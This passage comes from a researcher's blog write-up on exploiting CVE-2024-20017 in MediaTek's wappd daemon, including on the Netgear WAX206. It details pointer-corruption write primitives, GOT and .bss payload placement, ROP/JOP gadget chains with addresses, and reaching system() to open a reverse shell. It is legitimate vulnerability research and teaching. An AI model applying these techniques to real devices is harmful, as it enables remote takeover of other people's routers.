with the corruption we’re able to cause <em>before</em> reaching the stack canary.</p>

<p>As you may already know, the locally declared variables for a function are stored in the stack frame
for that function, immediately ahead of the saved return address and base pointer address. The
variables that sit between the end of the overflowed buffer and the start of the previous stack
frame will be corrupted by the overflow. Depending on how those values are used in the code that
executes after we’ve corrupted memory, it may be possible to abuse the effects of the corruption to
accomplish gain further control.</p>

<p>Below are the locally declard variables for the vulnerable function <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="n">RT_IAPP_SEND_SECURITY_BLOCK</span> <span class="o">*</span><span class="n">pSendSB</span><span class="p">;</span>
  <span class="n">UCHAR</span> <span class="o">*</span><span class="n">pBufMsg</span><span class="p">;</span>
  <span class="n">UINT32</span> <span class="n">BufLen</span><span class="p">,</span> <span class="n">if_idx</span><span class="p">;</span>
  <span class="n">POID_REQ</span> <span class="n">OidReq</span><span class="p">;</span>
  <span class="n">FT_KDP_EVT_KEY_ELM</span> <span class="n">kdp_info</span><span class="p">;</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">kdp_info</code> struct is the one that will be overflowed from the effects of the bug, and all of the
variables declared before it can be corrupted. Of particular interest in these situations are
pointers, which could potentially be abused to get a powerful write primitive – if we alter where a
pointer points to, any assignments or writes that the applications performs using that pointer will
result in data being written to an arbitrary address of our choice.</p>

<p>In this case, only a few lines of code remain which make use of the variables after the corruption
is triggered by the call to <code class="language-plaintext highlighter-rouge">IAPP_MEM_MOVE()</code>. These lines are show in the snippet below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="n">IAPP_HEX_DUMP</span><span class="p">(</span><span class="s">"kdp_info.MacAddr"</span><span class="p">,</span> <span class="n">kdp_info</span><span class="p">.</span><span class="n">MacAddr</span><span class="p">,</span> <span class="n">ETH_ALEN</span><span class="p">);</span>
  <span class="n">if_idx</span> <span class="o">=</span> <span class="n">mt_iapp_find_ifidx_by_sta_mac</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pCtrlBK</span><span class="o">-&gt;</span><span class="n">SelfFtStaTable</span><span class="p">,</span> <span class="n">kdp_info</span><span class="p">.</span><span class="n">MacAddr</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">if_idx</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">DBGPRINT</span><span class="p">(</span><span class="n">RT_DEBUG_TRACE</span><span class="p">,</span> <span class="s">"iapp&gt; %s: cannot find wifi interface</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">__FUNCTION__</span><span class="p">);</span>
    <span class="k">return</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">Len</span> <span class="o">=</span> <span class="n">BufLen</span> <span class="o">-</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">OID_REQ</span><span class="p">);</span>

  <span class="n">IAPP_MsgProcess</span><span class="p">(</span><span class="n">pCtrlBK</span><span class="p">,</span> <span class="n">IAPP_SET_OID_REQ</span><span class="p">,</span> <span class="n">pBufMsg</span><span class="p">,</span> <span class="n">BufLen</span><span class="p">,</span> <span class="n">if_idx</span><span class="p">);</span>

</code></pre></div></div>

<p>The most interesting of these is the assignment to <code class="language-plaintext highlighter-rouge">OidReq-&gt;Len</code> using the value in <code class="language-plaintext highlighter-rouge">BufLen</code>: the
former is an access that will dereference a pointer we can corrupt (<code class="language-plaintext highlighter-rouge">OidReq</code>), and the latter is an
access of an int32 value that we can also control (<code class="language-plaintext highlighter-rouge">BufLen</code>). In other words, we control both sides
of the assignment expression and can write an arbitrary 4-byte value to an arbitrary address.</p>

<p>So, what can we accomplish with this primitive? There are multiple strategies that might work at
this point and this is where the creativity in exploit development comes in. If our ultimate goal is
to execute <code class="language-plaintext highlighter-rouge">system()</code> to execute shell commands, we’ll generally have to do the following:</p>

<ol>
  <li>Get the command string we want executed into memory at a <em>known</em> address</li>
  <li>Get the pointer to that string placed into the appropriate register to be passed as the first argument to <code class="language-plaintext highlighter-rouge">system()</code> (i.e. put into <code class="language-plaintext highlighter-rouge">rdi</code> on x86_64)</li>
  <li>Redirect execution to <code class="language-plaintext highlighter-rouge">system()</code></li>
</ol>

<p>The exploit linked above applies this concept to corrupt the <code class="language-plaintext highlighter-rouge">OidReq</code> pointer and uses the 4-byte
write primitive to iteratively write a shell payload into a segment of the GOT (<strong>1</strong>); as the
binary is built with no PIE and only partial RELRO, the GOT is always at a predictable address and
writeable, so we can use it as a buffer for our payload. The only constraint on this is that we must
avoid overwriting GOT entries for functions that will get called somewhere along the execution path
to the vulnerable code, as this would result in a crash before the exploit has finished. The exploit
sends multiple corruption payloads to write the shell command, adjusting the corrupted <code class="language-plaintext highlighter-rouge">OidReq</code>
pointer on each request by +4 bytes to turn the 4-byte write into an arbitrary write-what-where. The
exploit then uses the 4-byte write to corrupt the GOT entry of <code class="language-plaintext highlighter-rouge">read()</code> with the address of a ROP
gadget that kicks off a ROP chain to adjust the stack, pop the address of the shell payload in the
GOT into <code class="language-plaintext highlighter-rouge">$rdi</code> (<strong>2</strong>), and then jumps to the call to <code class="language-plaintext highlighter-rouge">system()</code> (<strong>3</strong>) located in
<code class="language-plaintext highlighter-rouge">IAPP_PID_Kill()</code> to have the shell payload executed. <code class="language-plaintext highlighter-rouge">read()</code> was chosen as the GOT entry to
corrupt to redirect execution as it’s not in the execution path of the vulnerable code and we can
trigger it on-demand by sending a request over TCP since the handler for TCP connections uses
<code class="language-plaintext highlighter-rouge">read()</code> rather than <code class="language-plaintext highlighter-rouge">recvfrom()</code>; all of the earlier payloads are sent over UDP.</p>

<p>One important bit in the way this exploit works is that the redirection of execution happens async
from the payload that caused the corruption – it’s only triggered when we send the final TCP
request to causes the corrupted GOT entry for <code class="language-plaintext highlighter-rouge">read()</code> to be called, which means none of our
controlled data is at the top of the stack and none of the data we send in the TCP packet is ever
actually read (since <code class="language-plaintext highlighter-rouge">read()</code> is gone). This is a problem since we need to have controlled values at
the top of the stack after the first ROP gadget returns so that we can retain control of execution.
This is where a bit of luck comes in – in this case, we’re able to find some of the payload data
from the earlier requests that were sent about 40 bytes below the top of the stack frame (the stack
isn’t cleared between functions/uses), so we’re able to reach the payload data by popping 5 values
from the stack before doing anything else.</p>

<p>This exploit avoids corrupting the stack metadata at all, so stack canaries don’t come into play. It also
only makes use of predictable addresses and ROP to avoid dealing with ASLR, so no leak is needed.</p>

<p><img src="/assets/images/mtk-wapp-exploit2.png" alt="mtk-wapp-exploit2.png" /></p>

<hr />

<h2 id="exploit-3-return-address-corruption--arbitrary-write-via-rop-full-relro">exploit 3: return address corruption + arbitrary write via ROP (full RELRO)</h2>

<ul>
  <li>Build: x86_64, optimization level 2, forking daemon</li>
  <li>Mitigations: ASLR, full RELRO, NX</li>
  <li><a href="https://github.com/mellow-hype/cve-2024-20017/blob/main/x86_64/x86_64_full_relro.py" target="_blank">Exploit code</a></li>
</ul>

<p>So, the last exploit was able to get around the stack canaries and ASLR by using pointer corruption
to get an arbitrary write primitive, which was needed to allow us to write controlled values into
the GOT so that we would know the address of that data for use later in the exploit. But what if
that there wasn’t a pointer nearby for us to corrupt to get that arbitrary write? Well, it turns out
that if the application is built with optimization level set to 2 (<code class="language-plaintext highlighter-rouge">-O2</code>), various functions along
the execution path to the vulnerable code get inlined into one big function running within the scope
of <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code>, resulting in changes to the stack layout and ordering of variables. This
ends up making it impossible to corrupt the <code class="language-plaintext highlighter-rouge">OidReq</code> pointer that we previously relied on for the
arbitrary write, so another approach must be found.</p>

<p>Since we lost the write primitive we used in the previous exploit, we’ll disable stack canaries on
this version to give us a code redirection primitive to start with (we need to have <em>something</em> to
start with). This example is meant to demonstrate a way of getting an arbitrary write primitive from
a code exec primitive, as it’s not usually enough to be able to <em>just</em> redirect execution, so having
both will always make things much easier. To keep things interesting, we’ll enable full RELRO so
that the GOT and PLT sections are no longer writeable.</p>

<h3 id="arbitrary-write-via-rop">arbitrary write via ROP</h3>

<p>The first thing we need to do given the new restrictions is find a way to get an arbitrary write
primitive to allow us to write our command payload at a predictable address. Since we can influence
the flow of execution, our best bet is going to be to use ROP to get it. As with any exploit that
relies on ROP, there’s a certain amount of luck involved in that the binary your exploit is written
against needs to contain the required ROP gadgets within the main executable (shared objs will be
affected by ASLR).</p>

<p>If we think about how the previous r/w primitive worked, there was a pointer value being
dereferenced and a value assigned (i.e. written) to the memory it pointed to. What would this look
like in assembly? Probably something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	mov rax, [rsp+0x30];     # read a value from some address into $rax
	mov [rax], rbx;          # write the value of $rbx to the address pointed to by the value in $rax (deref $rax as pointer)
</code></pre></div></div>

<p>So, if we can find a gadget (or gadgets) that will allow us to do this kind of operation and we can
control the values that are used for both sides of the operation, we should be able to get an
arbitrary write primitive. And, it turns out, luck is on our side! The gadget below (<code class="language-plaintext highlighter-rouge">GADGET_A</code>) is
available:</p>

<p><strong>GADGET_A</strong></p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">0x405574</code>:
    <ul>
      <li><code class="language-plaintext highlighter-rouge">mov rdx, QWORD PTR [rsp+0x50];</code>: read a value at <code class="language-plaintext highlighter-rouge">$rsp+0x50</code> (top of stack+80) into <code class="language-plaintext highlighter-rouge">$rdx</code></li>
      <li><code class="language-plaintext highlighter-rouge">mov QWORD PTR [rdx], rax</code>: dereference <code class="language-plaintext highlighter-rouge">$rdx</code> as a pointer and write the value in <code class="language-plaintext highlighter-rouge">$rax</code> to that location</li>
      <li><code class="language-plaintext highlighter-rouge">xor eax, eax;</code>: 0 out lower 32 bits of <code class="language-plaintext highlighter-rouge">$rax</code></li>
      <li><code class="language-plaintext highlighter-rouge">add rsp; 0x48</code>: shift stack up by <code class="language-plaintext highlighter-rouge">0x48</code> bytes</li>
      <li><code class="language-plaintext highlighter-rouge">ret;</code>: return</li>
    </ul>
  </li>
</ul>

<p>Great! This gets us most of the way there. But first, we need to find a way to get controlled
values into <code class="language-plaintext highlighter-rouge">$rax</code> as that will be what gets written to the address in <code class="language-plaintext highlighter-rouge">$rdx</code>.  To do this, we need
to find a gadget that will take a value from the stack and put it into <code class="language-plaintext highlighter-rouge">$rax</code>, same as before. This
is usually easy enough as  <code class="language-plaintext highlighter-rouge">pop</code> operations happen all over the place and the odds are at least one
of them pops to <code class="language-plaintext highlighter-rouge">$rax</code>. This is the gadget I chose to go with for this exploit (<code class="language-plaintext highlighter-rouge">GADGET_B</code>):</p>

<p><strong>GADGET_B</strong></p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">0x0042acd8: pop rax; add rsp, 0x18; pop rbx; pop rbp; ret;</code>
    <ul>
      <li><code class="language-plaintext highlighter-rouge">pop rax;</code>: pop the value at the top of the stack into <code class="language-plaintext highlighter-rouge">$rax</code></li>
      <li><code class="language-plaintext highlighter-rouge">add rsp, 0x18;</code>: increment <code class="language-plaintext highlighter-rouge">$rsp</code> by <code class="language-plaintext highlighter-rouge">0x18 (24)</code> bytes; will need +24 bytes of padding to account for this operation</li>
      <li><code class="language-plaintext highlighter-rouge">pop rbx; pop rbp;</code>: pop the next two values from the (new) top of the stack into <code class="language-plaintext highlighter-rouge">$rbx</code> and <code class="language-plaintext highlighter-rouge">$rbp</code>, respectively; will need +16 bytes of padding to account for this operation</li>
      <li><code class="language-plaintext highlighter-rouge">ret;</code>: return</li>
    </ul>
  </li>
</ul>

<p>Chaining the second gadget with the first one gets us everything we need! We can now write an
arbitrary 8-byte value to an arbitrary address, assuming we control the values at the top of the
stack when execution is redirected (which we will since we corrupt the saved return address, which
is at the top of the stack). Here’s what the payload for this chain would look like, including the
padding needed to account for the instructions that modify the stack pointer.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GADGET_B
value_to_write ; popped into rax
padding[40]    ; account for 2 pops and a +0x18 shift to rsp
GADGET_A       ; value jumped to after ret from GADGET_B; read $rsp+50 into rdx
padding[72]    ; account for rsp+0x48
&lt;next_jump_addr&gt; ; addr jumped to after ret from GADGET_A
addr_to_write_to ; value read into $rdx in the start of GADGET_A
</code></pre></div></div>

<p>Similar to the previous exploit, this ROP chain can be inserted multiple times to write more than 8
bytes starting at a target address, but in order to do this, there’s one more gadget that is needed
to deal with a minor nuance in how <code class="language-plaintext highlighter-rouge">GADGET_A</code> interacts with the stack.</p>

<p>The first gadget we discuss above (<code class="language-plaintext highlighter-rouge">GADGET_A</code>) pops the value at <code class="language-plaintext highlighter-rouge">$rsp+0x50</code> into <code class="language-plaintext highlighter-rouge">$rdx</code>, so our
payload needs to place the address we want to write to at a <code class="language-plaintext highlighter-rouge">+0x50</code> byte offset from where this
gadget is in the payload. It then shifts the stack up by <code class="language-plaintext highlighter-rouge">+0x48</code>, leaving the stack pointer pointing
to the value right <em>before</em> the value we use as the write destination. This means the address of the
next gadget needs to be placed at <code class="language-plaintext highlighter-rouge">+0x48</code> so that it will be used when <code class="language-plaintext highlighter-rouge">ret</code> is reached; if we want
to perform <em>another</em> write, this would be the address for <code class="language-plaintext highlighter-rouge">GADGET_B</code>, and this is where the issue
comes up. After jumping to <code class="language-plaintext highlighter-rouge">GADGET_B</code>, it will pop the next value from the top of the stack
(<code class="language-plaintext highlighter-rouge">[$rsp]</code>) into <code class="language-plaintext highlighter-rouge">$rax</code>, but since <code class="language-plaintext highlighter-rouge">GADGET_A</code> shifted the stack pointer by <code class="language-plaintext highlighter-rouge">+0x48</code>, when the <code class="language-plaintext highlighter-rouge">ret</code> is
reached in <code class="language-plaintext highlighter-rouge">GADGET_A</code> the value of <code class="language-plaintext highlighter-rouge">$rsp</code> is incremented by 8 and left pointing to offset <code class="language-plaintext highlighter-rouge">+0x50</code>
(the value we pass as the write destination), and this is the value that <code class="language-plaintext highlighter-rouge">GADGET_B</code> would end up
popping into <code class="language-plaintext highlighter-rouge">$rax</code>. That’s not what we want, but thankfully there’s a simple way to solve this
problem: instead of jumping directly to <code class="language-plaintext highlighter-rouge">GADGET_B</code> at the end of the first chain, we jump to another
gadget that will pop a single value from the stack (thereby incrementing <code class="language-plaintext highlighter-rouge">$rsp</code>  to <code class="language-plaintext highlighter-rouge">+0x58</code>) and
we’ll place the address to <code class="language-plaintext highlighter-rouge">GADGET_B</code> there so that we jump to it when this gadget returns.</p>

<p>So, taking that into account, this is how the <code class="language-plaintext highlighter-rouge">GADGET_B+GADGET_A</code> sub-chain(?) would be chained
multiple times:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt;GADGET_B
value_to_write     ; popped into rax
padding[40]        ; account for 2 pops and a +0x18 shift to rsp
&gt;GADGET_A          ; value jumped to after ret from GADGET_B; read $rsp+50 into rdx
padding[72]        ; account for rsp+0x48
&gt;POP_RET_GADGET    ; addr jumped to after ret from GADGET_A; pop-ret so GADGET_B 8 bytes up is next ret address and not addr_to_write_to
addr_to_write_to   ; value read into $rdx in the start of GADGET_A;
--
&gt;GADGET_B
value_to_write     ; popped into rax
padding[40]        ; account for 2 pops and a +0x18 shift to rsp
&gt;GADGET_A          ; value jumped to after ret from GADGET_B; read $rsp+50 into rdx
padding[72]        ; account for rsp+0x48
&gt;POP_RET_GADGET    ; addr jumped to after ret from GADGET_A; pop-ret so GADGET_B 8 bytes up is next ret address and not addr_to_write_to
addr_to_write_to   ; value read into $rdx in the start of GADGET_A
--
...
--
&gt;GADGET_B
value_to_write
padding[40]
&gt;GADGET_A
padding[72]
&gt;FINAL_JUMP_DEST   ; addr jumped to after arbitrary write is done
addr_to_write_to
</code></pre></div></div>

<p>If this last part was hard to follow, don’t worry about it (it was also hard to write). The
important part is that rather than jumping directly back to <code class="language-plaintext highlighter-rouge">GADGET_B</code> when linking multiple
instances of the chain, we instead jump to a gadget that will pop a value from the stack and then
return to jump to <code class="language-plaintext highlighter-rouge">GADGET_B</code> . This is done to ensure the values in the payload are properly
adjusted between iterations through the chain.</p>

<h3 id="dealing-with-full-relro">dealing with full RELRO</h3>

<p>Having acquired the write primitive we needed, we can use the same strategy as the previous exploit
to write our shell payload at a predictable address, with a slight modification. As we can no longer
write into the GOT or PLT segments due to full RELRO, we instead write the shell command passed to
<code class="language-plaintext highlighter-rouge">system()</code> in the only remaining writeable segments that have static/predictable addresses (assuming
no PIE) – the .bss and .data segments. Once that’s done, the exploit jumps to a final ROP chain
that places the address where we wrote the command into <code class="language-plaintext highlighter-rouge">$rdi</code> and jumps to <code class="language-plaintext highlighter-rouge">system()</code> via the GOT
symbol so we don’t need to leak the libc address.</p>

<p>We get command execution and use it to pop a reverse shell.</p>

<p><img src="/assets/images/mtk-wapp-exploit3.png" alt="mtk-wapp-exploit3.png" /></p>

<hr />

<h2 id="exploit-4-wax206-return-address-corruption--arbitrary-rw-via-pointer-corruption">exploit 4: WAX206 return address corruption + arbitrary r/w via pointer corruption</h2>

<ul>
  <li>Build: aarch64, build shipped with Netgear WAX206</li>
  <li>Mitigations: full RELRO, ASLR, NX, stack canaries*</li>
  <li><a href="https://github.com/mellow-hype/cve-2024-20017/blob/main/WAX206-aarch64/wax-rip-system-rop.py" target="_blank">Exploit code</a></li>
</ul>

<p>We’ve made it to the final exploit! For this one we’re going to switch things up a bit and move on
to a real-world target: the version of wappd shipped on the <a href="https://www.netgear.com/support/product/wax206/" target="_blank">Netgear
WAX206</a>. This version is compiled for aarch64 and
has ASLR, NX, full RELRO, and stack cookies enabled. I think it offers some valuable insight into
the differences between writing exploits in controlled environments vs. writing them against
real-world targets – things often change in important ways that force you to adapt.</p>

<h3 id="the-story">the story</h3>

<p>I’m going to switch up the writing style for this section and use more of a narrative
format so that I can provide some context by walking through the process of how I figured everything
out. This exploit was a bit of a challenge to figure out and I think the process is best told as a
story. After that we’ll switch back to the style used in the preceding sections.</p>

<p><em>DISCLAIMER: This is the first time I’ve written this kind of exploit for an arm64 target and I had
to learn a lot of the stuff mentioned below along the way. For this reason, you should take the
details with a grain of salt as they’re my current understanding of how/why things worked a certain
way but they might not be 100% accurate. If you notice anything that’s incorrect please let me
know!</em></p>

<h4 id="important-changes">important changes</h4>

<p>I’ll start this section by going over some of the important differences for
this target and the previous ones, and how that ultimately impacted the final exploit.</p>

<p>The first major change was a difference in the optimization and inlining of code in the binary.
Whether it was the result if different compiler versions, architectural differences, or something
else, I’m ultimately not sure. But the outcome was that the layout of stack variables changed and
the ability to corrupt the <code class="language-plaintext highlighter-rouge">OidReq</code> pointer that was previously targeted was no longer viable,
similar to <strong>exploit 3</strong>. So, this meant there was no arbitrary write primitive to start with. What
about a code redirection primitive (which the previous exploit relied on to get the write
primitive)?</p>

<p>This is where the next important difference comes in: arm64’s way of handling function returns. In
arm64, the return address is usually expected to be in the <code class="language-plaintext highlighter-rouge">x30</code> register and it will only be pushed
onto the stack for nested function calls that will need to overwrite it. I learned this the hard way
when I attached to the process with GDB and could see my target jump address correctly placed on the
stack to be used on the next return…and then saw it go completely ignored when the function hit
the final <code class="language-plaintext highlighter-rouge">ret</code> and used the value in <code class="language-plaintext highlighter-rouge">x30</code> without touching the stack. The inlining mentioned above
resulted in various function calls along the path of the vulnerable code getting inlined into one
massive function, eliminating basically every opportunity to corrupt a return address on the stack
which would be used in a <code class="language-plaintext highlighter-rouge">ret</code> (inlined functions don’t <code class="language-plaintext highlighter-rouge">ret</code>). To top it all off, the <em>only</em> stack
frame that did have a saved return address that could be corrupted and that would actually be used
was for the main request processing loop – which runs infinitely and won’t return unless a SIGTERM
signal is caught (we’ll come back to this shortly). There is a ton of nuance for each of these
changes and their effect on the final exploit, but tl;dr, this meant needing to go back to the
drawing board to come up with a new exploit strategy.</p>

<p>The <em>one</em> piece of good news was that even though <code class="language-plaintext highlighter-rouge">checksec</code> reports that the binary has stack
canaries enabled, analyzing it in Binja showed that the cookie-checking logic inserted by the
compiler was only present in two functions, and those were from an external library. This meant that
I wouldn’t actually have to worry about stack cookies at all! Too bad corrupting saved return
addresses seems to be out of the question given the conditions described in the previous
paragraph…</p>

<h4 id="arbitrary-write-via-ppktbuf-pointer-corruption">arbitrary write via pPktBuf pointer corruption</h4>

<p>Based on the way I’d approached the previous exploits, I figured there had to be a way to corrupt a
pointer somewhere so that’s what I tackled first. After spending a bit of time doing some debugging
live on the WAX206 and testing different payloads, I eventually found that I could overwrite three
of the pointers defined in <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code>: <code class="language-plaintext highlighter-rouge">pPktBuf</code>, <code class="language-plaintext highlighter-rouge">pCmdBuf</code>, and <code class="language-plaintext highlighter-rouge">pRspBuf</code>. The first of
these, <code class="language-plaintext highlighter-rouge">pPktBuf</code>, points to the buffer that is used to store the inbound request data read from the
network – corrupting this pointer allows us to point it to an arbitrary location and then have the
entire contents of a subsequent request (up to 1600 bytes) written to that location. Great!</p>

<p>Interestingly, it was the effects of the inlining and arm64 semantics mentioned above that made it
possible to reach these pointers at all – under normal circumstances, writing far enough to reach
them would result in corrupting the stack frames for both <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> and
<code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code>, and cause a premature crash before the corrupted pointers could be used
again. In this case, <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code> is inlined directly into <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> (so no
return address is used) and <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> is able to get through it’s execution without
having to push/pop it’s return address value onto the stack where it could be corrupted.</p>

<p>So, I now had a write primitive of up to 1600 bytes to a controllable location. That should be
enough to get over the finish line, right?</p>

<h4 id="when-arbitrary-write-isnt-enough">when arbitrary write isn’t enough</h4>

<p>What exploit strategies are viable to achieve code execution when starting with only an arbitrary
write? Taking into account the mitigations present (namely ASLR) and assuming no leak is available,
there’s really only one option in this case: corrupt some data <em>located at a predictable/known
address</em>  which will either result in code execution directly (e.g. overwriting a function pointer)
or create conditions that will result in additional corruption that can be leveraged to take control
of execution. So, here we return to the concept discussed in <strong>exploit 2</strong>: finding corruptable data
that will be used by the application in a way that can be exploited.</p>

<p>I’ll save you the time (and frustration) of going over every possible avenue I went down looking for
this next piece and just tell you now: there was <em>nothing</em>. While there were multiple global
structures filled with function pointers, none of them are used within the request processing loop.
The data portions of some other data structures with viable targets also are unused. Full RELRO
means corrupting GOT/PLT entries is also out. And this brings us the main point here: sometimes even
arbitrary write primitives will <em>not be enough</em> to gain code execution. I’m of the mind that it’s
always a good idea to follow every thread and try every possible angle during exploit dev, but the
reality is that sometimes, there just isn’t any. Valid vulnerabilities that are exploitable in one
environment will not always be exploitable in another; everything matters. Which is why I also
follow the motto “exploit or GTFO” – unless impact has been shown against the real target with a
real exploit, little can be said about the <em>real-world impact</em> of a vulnerability.</p>

<h4 id="accepting-defeat-the-exploit-will-only-work-on-termination">accepting defeat: the exploit will only work on termination</h4>

<p>As mentioned in the <strong>important changes</strong> section, there was <em>one</em> return address that could be
corrupted: the one for <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code>. The issue was that this function only returns on process
termination when a SIGTERM is caught and handled. I’d initially ignored this since there’s no way to
force this termination as a remote attacker but, having hit a dead-end on finding another execution
primitive, I had to accept defeat and just decided to write the exploit with the assumption that the
process would terminate and hit the corrupted return address. The end of this post would be pretty
anticlimactic if I just stopped here, right?</p>

<h3 id="final-exploit-overview">final exploit overview</h3>

<p>Having gone over all of the important bits of the process that eventually led to the final exploit,
we’ll now switch back to the present and talk about how the exploit works. Given that this post is
already pretty long, I’ll avoid going over <em>every</em> detail of how the final exploit came together and
instead focus on the parts that I think are most interesting or important (feel free to reach out on
twitter if you have any follow up questions). This one reuses a few of the concepts that were
covered in previous exploits, including using pointer corruption to get a write primitive, using the
.bss/.data segment as a buffer for the main payload, and leveraging ROP (technical JOP, in this
case) to set up the arguments for calling <code class="language-plaintext highlighter-rouge">system()</code> to get command execution.</p>

<p>To summarize where we’re starting from:</p>
<ul>
  <li>We have an arbitrary write primitive of up to 1600 bytes via corruption of the <code class="language-plaintext highlighter-rouge">pPktBuf</code> pointer</li>
  <li>We have a way to redirect code execution via corruption of the saved return address in the stack frame for <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> (but this will only be triggered when the process receives a SIGTERM signal)</li>
</ul>

<p>The exploit is split up into two requests: one that corrupts the <code class="language-plaintext highlighter-rouge">pPktBuf</code> pointer to set up the
write primitive and another that uses the write primitive to write the shell payload and some other
data into a known memory region for later use.</p>

<p>The first one is pretty straightforward as all that really needs to be done is send a payload large
enough to overflow up to the <code class="language-plaintext highlighter-rouge">pPktBuf</code> pointer and make it point to the start of the .bss segment in
memory. As this pointer is used to store incoming request data, the contents of the <em>next</em> request
we send will be written to that address. Apart from corrupting this pointer, the first payload also
corrupts the <code class="language-plaintext highlighter-rouge">pCmdBuf</code> pointer, which is used to store data parsed out of the packet we send. As
such, <code class="language-plaintext highlighter-rouge">pCmdBuf</code> needs to point to a writeable segment of memory to avoid crashing or prematurely
aborting, so we overwrite it to also point to an offset into the .bss, but far enough to ensure it
won’t affect the payload sent in the second request.</p>

<p>The second request is where the real action happens. Having set up the write primitive with the
first request, this new payload needs to accomplish the following:</p>

<ol>
  <li>Write our shell command to a location we can reference when we call <code class="language-plaintext highlighter-rouge">system()</code></li>
  <li>Corrupt the saved return address to redirect code execution to a ROP gadget used to set up the argument to <code class="language-plaintext highlighter-rouge">system()</code>
    <ul>
      <li>ROP/JOP gadget does:
        <ul>
          <li>moves values in <code class="language-plaintext highlighter-rouge">x24</code> to <code class="language-plaintext highlighter-rouge">x0</code> (<code class="language-plaintext highlighter-rouge">x0</code> is used to pass first arg to the called function)</li>
          <li>jumps to the value in <code class="language-plaintext highlighter-rouge">x22</code></li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Provide the address to <code class="language-plaintext highlighter-rouge">system()</code> and the address of the shell command from step 1 so they can be used by the ROP gadget. These values will be loaded in registers when the corrupted return address is used and exec jumps to the ROP gadget.
    <ul>
      <li>address where shell command string was written -&gt; loaded into x0</li>
      <li>address of <code class="language-plaintext highlighter-rouge">system().plt</code> -&gt; loaded into x22</li>
    </ul>
  </li>
  <li>Corrupt the <code class="language-plaintext highlighter-rouge">pPktBuf</code>, <code class="language-plaintext highlighter-rouge">pCmdBuf</code>, and <code class="language-plaintext highlighter-rouge">pRspBuf</code> pointers to set them to NULL to avoid triggering libc malloc sanity checks when these pointers are free’d in <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> during termination</li>
  <li>Redirect execution to <code class="language-plaintext highlighter-rouge">system()</code> after having set up the argument (i.e. the address to the shell command written in step 1)</li>
</ol>

<p>The first two steps are pretty simple. We write the shell command we want executed right at the
start of the payload; since we’ve corrupted <code class="language-plaintext highlighter-rouge">pPktBuf</code> to point to a known location and that’s where
this second payload will be written, we can predict where this string will be located. In this case,
as <code class="language-plaintext highlighter-rouge">pPktBuf</code> has been set to the start of the .bss segment, the command string will be located 16
bytes into the .bss segment (to account for the packet header and other fields of the SB packet
struct). For step two, we know the offset into the overflow where the saved return address for
<code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> is located, so we simply overwrite that location with the address of the ROP
gadget we’ll use to set up arguments and redirect execution to <code class="language-plaintext highlighter-rouge">system()</code>.</p>

<p>Let’s take a moment to talk about that ROP gadget and ROP in general on arm64 vs. x86.  As mentioned
before, the return semantics are different in arm64 vs x86, which means the gadgets work a little
differently. In particular, ROP gadgets in arm64 don’t just need to end in a <code class="language-plaintext highlighter-rouge">ret</code> in order to be
useful; they have to end with the correct stack operation to pop the next value on the stack into
<code class="language-plaintext highlighter-rouge">x30</code> before executing the <code class="language-plaintext highlighter-rouge">ret</code>.  This combined with the fact that arm64 has many more general
purpose registers vs. x86 means that the likelihood of finding gadgets that make use of registers
you can control and that <em>also</em> properly set up for the <code class="language-plaintext highlighter-rouge">ret</code> is much lower vs. x86, where there are
only a handful of registers that are used and whatever is next on the stack is used automatically on
<code class="language-plaintext highlighter-rouge">ret</code>.</p>

<p>Anyway, the gadget used in the final exploit is technically a JOP (Jump Oriented Programming) gadget
so we avoid the issue with <code class="language-plaintext highlighter-rouge">ret</code> entirely. Rather than using <code class="language-plaintext highlighter-rouge">ret</code> to redirect execution, JOP
gadgets jump directly to a value stored in a register. We get lucky in that we’re able to control a
handful of registers at the time when execution is redirected to the gadget. Two of those registers
are <code class="language-plaintext highlighter-rouge">x22</code> and <code class="language-plaintext highlighter-rouge">x24</code>, so we’re able to use the following gadget, which simply moves the value in
<code class="language-plaintext highlighter-rouge">x24</code> to <code class="language-plaintext highlighter-rouge">x0</code> (the register used to pass the first arg to a function) and then jumps to the address
in <code class="language-plaintext highlighter-rouge">x22</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov x0, x24;   # we'll put the addr of the shell command string in x24
blr x22;       # and the address of `system()` in x22
</code></pre></div></div>

<p>Going back to the remainder of the exploit, the only other thing that needs to be done is corrupt
the <code class="language-plaintext highlighter-rouge">pPktBuf</code>, <code class="language-plaintext highlighter-rouge">pCmdBuf</code>, and <code class="language-plaintext highlighter-rouge">pRspBuf</code> pointers to set them each to NULL. We do this because at the
end of <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code>, prior to returning and using our corrupted return address, these
pointers will be passed to <code class="language-plaintext highlighter-rouge">free()</code> if they’re not NULL. If they’re still pointing to the previous
locations we set them to, we’ll end up triggering libc malloc’s sanity checks and trigger an
